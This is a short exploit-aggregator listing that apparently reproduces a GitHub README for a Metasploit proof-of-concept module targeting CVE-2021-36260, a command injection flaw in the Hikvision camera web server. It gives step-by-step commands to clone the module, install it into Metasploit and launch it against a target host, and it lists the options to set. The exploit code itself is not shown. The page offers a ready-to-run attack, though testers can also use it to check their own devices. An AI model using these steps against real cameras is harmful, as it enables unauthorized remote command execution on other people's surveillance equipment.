Exploit for OS Command Injection in Hikvision Ds-2Cd2026G2-Iu\/Sl Firmware CVE-2021-36260

Name: Exploit for OS Command Injection in Hikvision Ds-2Cd2026G2-Iu/Sl Firmware CVE-2021-36260
Rating: 5 (735 reviews)

2021-11-03 | CVSS 9.3

## https://sploitus.com/exploit?id=A065A4CD-AEE7-5474-82F9-77720A53CF23
# CVE-2021-36260-metasploit
the metasploit script(POC) about CVE-2021-36260. A command injection vulnerability in the web server of some Hikvision product, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

# preparation POC
```cmd
git clone https://github.com/TaroballzChen/CVE-2021-36260-metasploit
cd CVE-2021-36260-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp hikvision_web_server_build_210702_command_injection.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/hikvision_web_server_build_210702_command_injection.py
msfconsole
```

# POC usage
```text
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: false for http>
exploit
```

# result
![poc](poc.png)

# reference
- https://www.exploit-db.com/exploits/50441